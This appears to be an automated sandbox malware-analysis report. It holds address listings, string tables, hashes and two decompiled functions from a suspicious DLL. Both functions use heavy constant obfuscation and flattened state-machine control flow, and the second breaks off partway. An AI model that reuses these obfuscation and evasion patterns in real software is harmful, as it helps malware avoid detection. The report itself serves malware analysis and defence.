0x10017cb5
0x10017cc0
0x10017cc3
0x10017cc7
0x10017cd0
0x10017cd4
0x10017cdc
0x10017cef
0x10017cf6
0x10017d01
0x10017d0c
0x10017d1f
0x10017d26
0x10017d31
0x10017d43
0x10017d46
0x10017d4d
0x10017d55
0x10017d60
0x10017d6b
0x10017d75
0x10017d7d
0x10017d88
0x10017d90
0x10017d95
0x10017d9a
0x10017da2
0x10017dad
0x10017db5
0x10017dc0
0x10017dcb
0x10017dd6
0x10017dde
0x10017de6
0x10017dee
0x10017df6
0x10017dfe
0x10017e06
0x10017e11
0x10017e22
0x10017e27
0x10017e30
0x10017e3b
0x10017e46
0x10017e51
0x10017e5c
0x10017e67
0x10017e77
0x10017e7a
0x10017e81
0x10017e8c
0x10017ea2
0x10017ea9
0x10017eb4
0x10017ebf
0x10017eca
0x10017ed5
0x10017edd
0x10017ee5
0x10017eed
0x10017ef5
0x10017f00
0x10017f0b
0x10017f16
0x10017f1e
0x10017f26
0x10017f2f
0x10017f32
0x10017f36
0x10017f3e
0x10017f46
0x10017f4b
0x10017f53
0x10017f5b
0x10017f63
0x10017f68
0x10017f70
0x10017f75
0x10017f7d
0x10017f85
0x10017f8a
0x10017f97
0x10017f9b
0x10017fa3
0x10017fab
0x10017fb8
0x10017fbd
0x10017fc3
0x10017fcb
0x10017fd3
0x10017fe6
0x10017fe9
0x10017ff0
0x10017ffb
0x10018006
0x1001800e
0x1001801b
0x1001801f
0x10018027
0x1001803a
0x1001803d
0x10018044
0x1001804f
0x1001805a
0x10018065
0x10018070
0x1001807b
0x10018086
0x10018091
0x1001809c
0x100180a7
0x100180af
0x100180b7
0x100180bc
0x100180c4
0x100180cc
0x100180e2
0x100180e9
0x100180f4
0x100180fc
0x10018101
0x10018106
0x1001810e
0x10018116
0x10018121
0x1001812c
0x10018137
0x10018143
0x10018148
0x1001814e
0x10018156
0x1001815e
0x10018166
0x10018178
0x1001817b
0x10018182
0x1001818d
0x10018195
0x100181a2
0x100181a6
0x100181ab
0x100181b5
0x100181c3
0x100181c8
0x100181ce
0x100181d2
0x100181da
0x100181e2
0x100181ea
0x100181ef
0x100181f7
0x100181ff
0x10018207
0x10018212
0x1001821d
0x10018228
0x10018233
0x1001823b
0x10018246
0x1001824e
0x10018256
0x1001825b
0x10018260
0x10018268
0x10018273
0x1001827e
0x10018289
0x1001829b
0x100182a0
0x100182a9
0x100182b4
0x100182bc
0x100182c4
0x100182cc
0x100182d4
0x100182dc
0x100182e4
0x100182e9
0x100182f1
0x100182f6
0x100182fe
0x10018310
0x10018315
0x1001831e
0x10018329
0x10018334
0x1001833f
0x10018347
0x10018352
0x10018365
0x10018368
0x1001836f
0x1001837a
0x10018385
0x1001838d
0x10018398
0x100183ae
0x100183b5
0x100183c0
0x100183d2
0x100183d5
0x100183dc
0x100183e7
0x100183fd
0x10018402
0x10018409
0x10018414
0x1001841f
0x1001842a
0x10018435
0x10018440
0x10018448
0x10018450
0x1001845f
0x10018463
0x1001846b
0x10018473
0x1001847b
0x10018480
0x10018488
0x10018490
0x100184a6
0x100184ad
0x100184b8
0x100184c4
0x100184c9
0x100184cf
0x100184d9
0x100184dc
0x100184e0
0x100184e8
0x100184fe
0x10018505
0x10018510
0x1001851b
0x10018526
0x1001852e
0x10018539
0x10018541
0x10018549
0x1001854e
0x10018553
0x1001855b
0x1001856d
0x10018572
0x10018582
0x10018585
0x1001858c
0x10018597
0x1001859f
0x100185a7
0x100185ac
0x100185b4
0x100185bc
0x100185c7
0x100185d2
0x100185dd
0x100185e8
0x100185fb
0x10018602
0x1001860a
0x10018615
0x1001861c
0x10018620
0x10018620
0x10018620
0x10018625
0x10018625
0x10018627
0x00000000
0x00000000
0x1001862d
0x1001862d
0x1001881b
0x1001881d
0x10018824
0x10018825
0x00000000
0x10018633
0x10018639
0x10018803
0x00000000
0x1001863f
0x10018646
0x100187ac
0x100187e3
0x100187e8
0x100187eb
0x100187ef
0x100187fb
0x00000000
0x1001864c
0x10018652
0x10018a20
0x10018658
0x1001865e
0x10018795
0x10018797
0x1001879c
0x100187a0
0x100187a4
0x00000000
0x10018664
0x1001866b
0x100189fa
0x100189fa
0x10018a00
0x10018a02
0x10018625
0x10018625
0x10018627
0x00000000
0x00000000
0x00000000
0x10018627
0x00000000
0x10018625
0x10018671
0x10018671
0x10018673
0x10018675
0x1001867a
0x10018681
0x10018693
0x10018698
0x1001869a
0x1001869d
0x1001869d
0x100186da
0x10018708
0x10018711
0x10018721
0x10018728
0x1001872d
0x10018732
0x100189cf
0x100189cf
0x10018738
0x10018751
0x10018760
0x10018765
0x10018768
0x1001876f
0x1001876f
0x10018774
0x10018774
0x10018778
0x10018778
0x00000000
0x10018778
0x1001866b
0x1001865e
0x10018652
0x10018646
0x10018639
0x10018a28
0x10018a32
0x1001882d
0x1001882d
0x10018833
0x100189e6
0x100189ec
0x00000000
0x10018839
0x10018839
0x1001883f
0x100189c9
0x00000000
0x10018845
0x10018845
0x1001884b
0x10018954
0x10018985
0x10018998
0x100189a3
0x100189af
0x100189b2
0x100189b7
0x100189f1
0x100189f1
0x100189f5
0x00000000
0x10018851
0x10018851
0x10018857
0x100188fc
0x100188fe
0x10018904
0x10018904
0x10018900
0x10018900
0x10018900
0x10018906
0x10018908
0x1001890f
0x1001890f
0x1001890a
0x1001890a
0x1001890a
0x10018937
0x1001893c
0x10018941
0x10018949
0x00000000
0x1001885d
0x1001885d
0x10018863
0x00000000
0x10018869
0x1001887f
0x10018886
0x1001888b
0x1001888d
0x1001888e
0x10018890
0x100188b1
0x100188b6
0x100188b9
0x100188bb
0x100188bd
0x100188c1
0x100188d0
0x100188d5
0x100188d8
0x100188d8
0x100188ec
0x100188f1
0x100188f2
0x00000000
0x100188f2
0x10018863
0x10018857
0x1001884b
0x1001883f
0x00000000
0x10018833
0x10018625

Strings

O 6, xrefs: 10017C21
P26, xrefs: 10017CF6
q, xrefs: 10017F36
z, xrefs: 100185AC
He, xrefs: 10018182
:G, xrefs: 10017E06
O%, xrefs: 10018539
m, xrefs: 10017EF5
^, xrefs: 10017D01
Fe, xrefs: 100186DA
5, xrefs: 10017D60
<, xrefs: 100183E7
1=v, xrefs: 10017F75
w, xrefs: 1001831E

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$1=v$5$:G$Fe$He$O 6$O%$P26$m$<$^$w$z
API String ID: 0-1231479166
Opcode ID: afa03577a389d7ce8369ba5d7b829a9e9a64cfe6979076f35fe8cd339409ace6
Instruction ID: fa6a20dbfc92192d26da4b220c1807e9028ff741cec42b8484237f2a2f398c25
Opcode Fuzzy Hash: afa03577a389d7ce8369ba5d7b829a9e9a64cfe6979076f35fe8cd339409ace6
Instruction Fuzzy Hash: D972EF715083818BE378CF25C88AB9FBBE2FBC4314F10891DE5999A2A0D7B59945CF53

Uniqueness

Uniqueness Score: -1.00%

Function 100067EF Relevance: 16.7, Strings: 13, Instructions: 464
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E100067EF(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				unsigned int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				void* _t431;
				intOrPtr _t476;
				intOrPtr _t482;
				intOrPtr _t483;
				signed int _t485;
				signed int _t487;
				signed int _t493;
				intOrPtr _t494;
				void* _t495;
				intOrPtr _t503;
				intOrPtr _t505;
				signed int _t509;
				signed int* _t510;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				intOrPtr _t526;
				intOrPtr _t554;
				intOrPtr _t558;
				void* _t559;
				intOrPtr _t561;
				intOrPtr _t565;
				void* _t567;
				signed int* _t582;
				void* _t585;

				_push(_a8);
				_t510 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t431);
				_v12 = 0x17937f;
				_t565 = 0;
				_v8 = 0x716496;
				_t582 =  &(( &_v212)[4]);
				_v4 = 0;
				_v140 = 0x4104;
				_t567 = 0x31a072da;
				_v140 = _v140 + 0x447c;
				_t512 = 0x2c;
				_v140 = _v140 * 0x19;
				_v140 = _v140 ^ 0x000d6f8e;
				_v128 = 0xcf3;
				_v128 = _v128 + 0xfffff042;
				_v128 = _v128 * 0x3e;
				_v128 = _v128 ^ 0xffffd2d2;
				_v124 = 0x2a0f;
				_v124 = _v124 << 7;
				_v124 = _v124 * 0x70;
				_v124 = _v124 ^ 0x0933c800;
				_v148 = 0x338f;
				_v148 = _v148 / _t512;
				_v148 = _v148 + 0xffff0b9c;
				_v148 = _v148 ^ 0xffff0cc6;
				_v96 = 0x90ec;
				_v96 = _v96 | 0x4c75b133;
				_v96 = _v96 ^ 0x4c75b1bf;
				_v48 = 0x862e;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0xf0000043;
				_v192 = 0xba1e;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 << 0x10;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 ^ 0x000059bb;
				_v200 = 0x378e;
				_v200 = _v200 + 0xffff308c;
				_v200 = _v200 | 0x3e586b1b;
				_v200 = _v200 ^ 0x5185d5a4;
				_v200 = _v200 ^ 0xae7ac2ae;
				_v168 = 0xb2ed;
				_t513 = 0x5d;
				_v168 = _v168 / _t513;
				_v168 = _v168 | 0xc5bdafdd;
				_v168 = _v168 ^ 0xc5bde408;
				_v176 = 0xc4df;
				_v176 = _v176 >> 2;
				_v176 = _v176 ^ 0xd9c03405;
				_v176 = _v176 * 0x17;
				_v176 = _v176 ^ 0x90401e33;
				_v116 = 0x79ce;
				_v116 = _v116 * 0x3b;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x01c12efe;
				_v88 = 0x4199;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x000016ee;
				_v32 = 0xc8e6;
				_v32 = _v32 | 0x9bed8174;
				_v32 = _v32 ^ 0x9bed9e1f;
				_v188 = 0x5390;
				_t514 = 0x3a;
				_v188 = _v188 / _t514;
				_v188 = _v188 << 6;
				_v188 = _v188 | 0x3d2eb713;
				_v188 = _v188 ^ 0x3d2edd0a;
				_v204 = 0x58fb;
				_v204 = _v204 >> 6;
				_v204 = _v204 + 0xf15b;
				_v204 = _v204 ^ 0x0000d418;
				_v72 = 0x9f3d;
				_v72 = _v72 + 0xffff3777;
				_v72 = _v72 ^ 0xffff8242;
				_v24 = 0xde3b;
				_t515 = 0xc;
				_v24 = _v24 * 0x21;
				_v24 = _v24 ^ 0x001cbf65;
				_v52 = 0x9dec;
				_v52 = _v52 | 0xa1e041a1;
				_v52 = _v52 ^ 0xa1e09fab;
				_v108 = 0x27;
				_v108 = _v108 + 0xffffcee9;
				_v108 = _v108 + 0x86d7;
				_v108 = _v108 ^ 0x00006510;
				_v60 = 0x3380;
				_v60 = _v60 ^ 0xb4567d2a;
				_v60 = _v60 ^ 0xb4565f0c;
				_v68 = 0x71f5;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00006eec;
				_v132 = 0x63a2;
				_v132 = _v132 | 0xa34eb625;
				_v132 = _v132 << 0x10;
				_v132 = _v132 ^ 0xf7a77efa;
				_v84 = 0x4025;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0000336a;
				_v92 = 0xf737;
				_v92 = _v92 / _t515;
				_v92 = _v92 ^ 0x000070d8;
				_v112 = 0xe747;
				_t516 = 0x45;
				_v112 = _v112 / _t516;
				_v112 = _v112 << 1;
				_v112 = _v112 ^ 0x00003bc1;
				_v100 = 0x5c9c;
				_v100 = _v100 << 5;
				_v100 = _v100 ^ 0x000ba43a;
				_v56 = 0x8dc3;
				_t517 = 0x46;
				_v56 = _v56 * 0x53;
				_v56 = _v56 ^ 0x002dfe13;
				_v144 = 0x7f61;
				_v144 = _v144 * 0x38;
				_v144 = _v144 ^ 0x6f8821ea;
				_v144 = _v144 ^ 0x6f938ffa;
				_v160 = 0x339d;
				_v160 = _v160 / _t517;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 ^ 0x00006f53;
				_v136 = 0xb124;
				_v136 = _v136 * 0x7c;
				_v136 = _v136 * 0x3b;
				_v136 = _v136 ^ 0x13c6547a;
				_v196 = 0xba81;
				_v196 = _v196 / _t517;
				_t518 = 0x70;
				_v196 = _v196 / _t518;
				_v196 = _v196 + 0x66bc;
				_v196 = _v196 ^ 0x00000a53;
				_v36 = 0x2f28;
				_t519 = 0x7d;
				_v36 = _v36 * 0x2b;
				_v36 = _v36 ^ 0x0007f00e;
				_v184 = 0xa6cb;
				_v184 = _v184 << 4;
				_v184 = _v184 >> 0xe;
				_v184 = _v184 * 0x42;
				_v184 = _v184 ^ 0x00006eb4;
				_v44 = 0x29af;
				_v44 = _v44 / _t519;
				_v44 = _v44 ^ 0x00000c2e;
				_v76 = 0xf2bd;
				_v76 = _v76 + 0xffff85ae;
				_v76 = _v76 ^ 0x0000580a;
				_v180 = 0x9e33;
				_v180 = _v180 + 0xb14;
				_t520 = 0x22;
				_v180 = _v180 / _t520;
				_v180 = _v180 ^ 0x06128f94;
				_v180 = _v180 ^ 0x061285a5;
				_v156 = 0xb8a6;
				_v156 = _v156 + 0xffff4ef3;
				_v156 = _v156 + 0xffff8947;
				_v156 = _v156 ^ 0xffffe205;
				_v28 = 0xff3d;
				_v28 = _v28 * 0x62;
				_v28 = _v28 ^ 0x0061cef4;
				_v152 = 0x8aff;
				_v152 = _v152 >> 0xe;
				_v152 = _v152 >> 5;
				_v152 = _v152 ^ 0x00004619;
				_v64 = 0x955d;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x00007002;
				_v172 = 0x4f5b;
				_v172 = _v172 >> 7;
				_v172 = _v172 | 0xb7eb094d;
				_v172 = _v172 + 0xee15;
				_v172 = _v172 ^ 0xb7ebdb2b;
				_v40 = 0xb46c;
				_v40 = _v40 * 0x5c;
				_v40 = _v40 ^ 0x0040dad9;
				_v120 = 0x778c;
				_v120 = _v120 << 2;
				_v120 = _v120 << 0xf;
				_v120 = _v120 ^ 0xef181660;
				_v80 = 0x755c;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00007efb;
				_v104 = 0xe94f;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x00077cc2;
				_v208 = 0xae0c;
				_v208 = _v208 + 0xffffc94b;
				_v208 = _v208 << 8;
				_t521 = 0x63;
				_v208 = _v208 / _t521;
				_v208 = _v208 ^ 0x00003498;
				_v212 = 0xbf25;
				_t522 = 0x31;
				_v212 = _v212 * 0x38;
				_v212 = _v212 + 0xffffb183;
				_v212 = _v212 / _t522;
				_v212 = _v212 ^ 0x0000d8ca;
				_v164 = 0x4b56;
				_v164 = _v164 + 0xd39e;
				_v164 = _v164 >> 8;
				_v164 = _v164 ^ 0x0000011f;
				goto L1;
				do {
					while(1) {
						L1:
						_t585 = _t567 - 0x2d4d5f48;
						if(_t585 > 0) {
							break;
						}
						if(_t585 == 0) {
							_t483 =  *0x10020400; // 0x0
							_t554 =  *0x10020400; // 0x0
							_t522 = _v76;
							_t485 = E100192C8(_t522,  *((intOrPtr*)(_t554 + 0xc)), _v140, _v180, _v148, _t483 + 0x10, _v156);
							_t582 =  &(_t582[5]);
							asm("sbb esi, esi");
							_t567 = ( ~_t485 & 0xe2706b8a) + 0x2fe1d82b;
							continue;
						} else {
							if(_t567 == 0xf182b02) {
								_t526 =  *0x10020400; // 0x0
								_t394 = _t526 + 0x18; // 0x18
								_t487 = E10013297(_v84, _v16, _v92, _v112, _v20, _t526,  *((intOrPtr*)(_t526 + 0xc)), _t394, _v100, _t522, _v56, _v144);
								_t522 = _v160;
								asm("sbb esi, esi");
								_t567 = ( ~_t487 & 0x19013217) + 0x144c2d31;
								E10011C64(_t522, _v136, _v196, _v20);
								_t582 =  &(_t582[0xc]);
								goto L23;
							} else {
								if(_t567 == 0x125243b5) {
									_t494 =  *0x10020400; // 0x0
									_t522 = _v28;
									_t495 = E10006716(_t522, _v128, _t522, _t522,  *((intOrPtr*)(_t494 + 0xc)), _v152, _v64, _t522, _v172, _v40);
									_t582 =  &(_t582[8]);
									if(_t495 != 0) {
										_t565 = 1;
									} else {
										_t567 = 0x16479e62;
										continue;
									}
								} else {
									if(_t567 == 0x144c2d31) {
										_t561 =  *0x10020400; // 0x0
										E10009AC4( *((intOrPtr*)(_t561 + 0xc)));
										_t582 = _t582 - 0xc + 0xc;
										_t567 = 0x30e289f7;
										continue;
									} else {
										if(_t567 == 0x16479e62) {
											_t503 =  *0x10020400; // 0x0
											E1000C9EE(_t522,  *((intOrPtr*)(_t503 + 0x10)));
											_pop(_t522);
											_t567 = 0x2fe1d82b;
											continue;
										} else {
											if(_t567 != 0x241bb339) {
												goto L23;
											} else {
												_t505 =  *0x10020400; // 0x0
												_t522 = _v116;
												_t509 = E10012ABE(_t522, _v88, _t522, _v32, _v188, _t522, _t522, _v48 | _v96, _t505 + 0xc);
												_t582 =  &(_t582[7]);
												asm("sbb esi, esi");
												_t567 = ( ~_t509 & 0x05a58119) + 0x30e289f7;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						return _t565;
					}
					if(_t567 == 0x2fe1d82b) {
						_t476 =  *0x10020400; // 0x0
						E1000C9EE(_t522,  *((intOrPtr*)(_t476 + 0x18)));
						_pop(_t522);
						_t567 = 0x144c2d31;
						goto L23;
					} else {
						if(_t567 == 0x30e289f7) {
							_t558 =  *0x10020400; // 0x0
							E1000DE81(_v168, _t558, _v176);
						} else {
							if(_t567 == 0x31a072da) {
								_t559 = 0x24;
								_t482 = E100054FB(_t559);
								 *0x10020400 = _t482;
								_t522 = _t522;
								if(_t482 != 0) {
									_t567 = 0x241bb339;
									goto L1;
								}
							} else {
								if(_t567 != 0x36880b10) {
									goto L23;
								} else {
									_t522 =  *_t510;
									_t493 = E100096ED(_t522, _v52,  &_v20, _t522, _v108, _v60, _v164 | _v208, _v212, _v68, _t510[1], _v124,  &_v16, _v132);
									_t582 =  &(_t582[0xb]);
									asm("sbb esi, esi");
									_t567 = ( ~_t493 & 0xfacbfdd1) + 0x144c2d31;
									goto L1;
								}
							}
						}
					}
					goto L27;
					L23:
				} while (_t567 != 0x684bf);
				goto L27;
			}

0x100067f9
0x10006800
0x10006802
0x10006809
0x1000680a
0x1000680b
0x10006810
0x1000681b
0x1000681d
0x10006828
0x1000682b
0x10006834
0x1000683c
0x10006841
0x10006850
0x10006853
0x10006857
0x1000685f
0x10006867
0x10006874
0x10006878
0x10006880
0x10006888
0x10006892
0x10006896
0x1000689e
0x100068ae
0x100068b2
0x100068ba
0x100068c2
0x100068cd
0x100068d8
0x100068e3
0x100068ee
0x100068f6
0x10006901
0x10006909
0x1000690e
0x10006913
0x10006918
0x10006920
0x10006928
0x10006930
0x10006938
0x10006940
0x10006948
0x10006954
0x10006957
0x1000695b
0x10006963
0x1000696b
0x10006973
0x10006978
0x10006985
0x10006989
0x10006991
0x1000699e
0x100069a2
0x100069a7
0x100069af
0x100069ba
0x100069c1
0x100069cc
0x100069d7
0x100069e2
0x100069ef
0x100069fd
0x10006a02
0x10006a08
0x10006a0d
0x10006a15
0x10006a1d
0x10006a2d
0x10006a32
0x10006a3a
0x10006a42
0x10006a4d
0x10006a58
0x10006a63
0x10006a76
0x10006a79
0x10006a80
0x10006a8b
0x10006a96
0x10006aa1
0x10006aac
0x10006ab4
0x10006abc
0x10006ac4
0x10006acc
0x10006ad7
0x10006ae2
0x10006aed
0x10006af8
0x10006b00
0x10006b0b
0x10006b13
0x10006b1b
0x10006b20
0x10006b28
0x10006b33
0x10006b3b
0x10006b46
0x10006b5c
0x10006b63
0x10006b6e
0x10006b7a
0x10006b7f
0x10006b85
0x10006b89
0x10006b91
0x10006b9c
0x10006ba4
0x10006baf
0x10006bc2
0x10006bc3
0x10006bca
0x10006bd5
0x10006be2
0x10006be6
0x10006bee
0x10006bf6
0x10006c04
0x10006c08
0x10006c0d
0x10006c17
0x10006c26
0x10006c2f
0x10006c33
0x10006c3b
0x10006c4b
0x10006c53
0x10006c58
0x10006c5e
0x10006c66
0x10006c6e
0x10006c81
0x10006c84
0x10006c8b
0x10006c96
0x10006c9e
0x10006ca3
0x10006cad
0x10006cb1
0x10006cb9
0x10006ccf
0x10006cd6
0x10006ce1
0x10006cec
0x10006cf7
0x10006d02
0x10006d0a
0x10006d16
0x10006d19
0x10006d1d
0x10006d25
0x10006d2d
0x10006d35
0x10006d3d
0x10006d45
0x10006d4d
0x10006d60
0x10006d67
0x10006d72
0x10006d7a
0x10006d7f
0x10006d84
0x10006d8c
0x10006d97
0x10006d9f
0x10006daa
0x10006db2
0x10006db7
0x10006dbf
0x10006dc7
0x10006dcf
0x10006de2
0x10006de9
0x10006df4
0x10006dfc
0x10006e01
0x10006e06
0x10006e0e
0x10006e19
0x10006e20
0x10006e2d
0x10006e3a
0x10006e3f
0x10006e47
0x10006e4f
0x10006e57
0x10006e62
0x10006e67
0x10006e6d
0x10006e75
0x10006e82
0x10006e83
0x10006e87
0x10006e95
0x10006e99
0x10006ea1
0x10006ea9
0x10006eb1
0x10006eb6
0x10006eb6
0x10006ebe
0x10006ebe
0x10006ebe
0x10006ebe
0x10006ec4
0x00000000
0x00000000
0x10006eca
0x10007074
0x10007089
0x1000708f
0x10007099
0x1000709e
0x100070a5
0x100070ad
0x00000000
0x10006ed0
0x10006ed6
0x10007009
0x1000700f
0x1000703a
0x10007055
0x10007059
0x10007061
0x10007063
0x10007068
0x00000000
0x10006edc
0x10006ee2
0x10006fc7
0x10006fd5
0x10006fdc
0x10006fe1
0x10006fe6
0x1000719f
0x10006fec
0x10006fec
0x00000000
0x10006fec
0x10006ee8
0x10006eea
0x10006f95
0x10006f9e
0x10006fa3
0x10006fa6
0x00000000
0x10006ef0
0x10006ef6
0x10006f66
0x10006f6f
0x10006f75
0x10006f76
0x00000000
0x10006ef8
0x10006efe
0x00000000
0x10006f04
0x10006f04
0x10006f31
0x10006f38
0x10006f3d
0x10006f44
0x10006f4c
0x00000000
0x10006f4c
0x10006efe
0x10006ef6
0x10006eea
0x10006ee2
0x10006ed6
0x100071b6
0x100071c2
0x100071c2
0x100070be
0x1000717d
0x10007186
0x1000718c
0x1000718d
0x00000000
0x100070c4
0x100070ca
0x100071a6
0x100071b0
0x100070d0
0x100070d6
0x10007151
0x10007152
0x10007157
0x1000715c
0x1000715f
0x10007161
0x00000000
0x10007161
0x100070d8
0x100070de
0x00000000
0x100070e4
0x10007128
0x1000712b
0x10007130
0x10007137
0x1000713f
0x00000000
0x1000713f
0x100070de
0x100070d6
0x100070ca
0x00000000
0x1000718f
0x1000718f
0x00000000

Strings

VK, xrefs: 10006EA1
n, xrefs: 10006B00
[O, xrefs: 10006DAA
|D, xrefs: 10006841
(/, xrefs: 10006C6E
H_M-, xrefs: 10006EBE
So, xrefs: 10006C0D
X, xrefs: 10006CF7
C, xrefs: 100068F6
G, xrefs: 10006B6E
\u, xrefs: 10006E0E
S, xrefs: 10006C66
O, xrefs: 10006E2D

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: X$(/$C$G$H_M-$O$S$So$VK$[O$\u$|D$n
API String ID: 0-3751547790
Opcode ID: 9cab8fcf73cfd61d32806bee9bedcd1910f9ab7ffc69bc9f1c60e6efff96cf2a
Instruction ID: 0be59840ba910cd7e0c708c88e1e140af0542e1ef102954bd364e1e765fd723e
Opcode Fuzzy Hash: 9cab8fcf73cfd61d32806bee9bedcd1910f9ab7ffc69bc9f1c60e6efff96cf2a
Instruction Fuzzy Hash: BB321472508380DFE368CF25C989A4BBBE2FBC4344F108A1DE5D9962A4D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 1000240F Relevance: 16.7, Strings: 13, Instructions: 442
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E1000240F(intOrPtr __ecx, signed int __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				unsigned int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _t472;
				void* _t476;
				void* _t480;
				intOrPtr* _t485;
				intOrPtr _t486;
				intOrPtr* _t488;
				void* _t494;
				intOrPtr* _t497;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t516;
				signed int _t519;
				signed int _t564;
				intOrPtr* _t565;
				signed int _t566;
				intOrPtr _t570;
				void* _t571;
				void* _t572;
				void* _t575;

				_v544 = __edx;
				_t570 = __ecx;
				_v548 = _v548 & 0x00000000;
				_v576 = 0x3ff0;
				_v576 = _v576 ^ 0x9e7bb91e;
				_v576 = _v576 ^ 0x9c7b86ee;
				_v692 = 0xaef0;
				_v692 = _v692 + 0xffffcefc;
				_v692 = _v692 >> 0xe;
				_v692 = _v692 + 0xe475;
				_v692 = _v692 ^ 0x00008036;
				_v604 = 0xa47c;
				_v604 = _v604 | 0xf2af965e;
				_v604 = _v604 ^ 0xf2aff58b;
				_v684 = 0xd40f;
				_v684 = _v684 ^ 0x5c880073;
				_v684 = _v684 + 0xffff2d46;
				_v684 = _v684 + 0x9a08;
				_v684 = _v684 ^ 0x5c88f0b5;
				_v676 = 0x197b;
				_v676 = _v676 + 0xef0f;
				_v676 = _v676 | 0x9fafbede;
				_v676 = _v676 ^ 0x9fafba55;
				_v636 = 0x6087;
				_v636 = _v636 ^ 0xfc35d72d;
				_v636 = _v636 * 0x5c;
				_v636 = _v636 ^ 0xa34e606a;
				_t566 = 0x20234bc;
				_v612 = 0xefe3;
				_v612 = _v612 ^ 0x3ca49539;
				_t506 = 0x3c;
				_v612 = _v612 * 0x15;
				_v612 = _v612 ^ 0xf97e0d4d;
				_v668 = 0xac56;
				_v668 = _v668 << 0x10;
				_v668 = _v668 + 0x99a;
				_v668 = _v668 + 0xbf11;
				_v668 = _v668 ^ 0xac56db40;
				_v584 = 0xe1f0;
				_v584 = _v584 | 0x72c35923;
				_v584 = _v584 ^ 0x72c3ed92;
				_v620 = 0xe61b;
				_v620 = _v620 + 0x2c24;
				_v620 = _v620 / _t506;
				_v620 = _v620 ^ 0x00007f0c;
				_v628 = 0x58a0;
				_t507 = 0x65;
				_v628 = _v628 / _t507;
				_t508 = 0x1e;
				_v628 = _v628 / _t508;
				_v628 = _v628 ^ 0x00007423;
				_v592 = 0x80dd;
				_v592 = _v592 ^ 0xdc543aa4;
				_v592 = _v592 ^ 0xdc54f390;
				_v600 = 0x5ccb;
				_v600 = _v600 >> 8;
				_v600 = _v600 ^ 0x00007813;
				_v616 = 0xd1a2;
				_v616 = _v616 >> 7;
				_v616 = _v616 >> 0xc;
				_v616 = _v616 ^ 0x00001864;
				_v728 = 0xbeeb;
				_v728 = _v728 << 0xf;
				_t509 = 0x23;
				_v728 = _v728 / _t509;
				_t510 = 0x3b;
				_v728 = _v728 * 0x5f;
				_v728 = _v728 ^ 0x031a06f0;
				_v648 = 0x1000;
				_v648 = _v648 * 0x2f;
				_v648 = _v648 + 0xb758;
				_v648 = _v648 ^ 0x0003bc82;
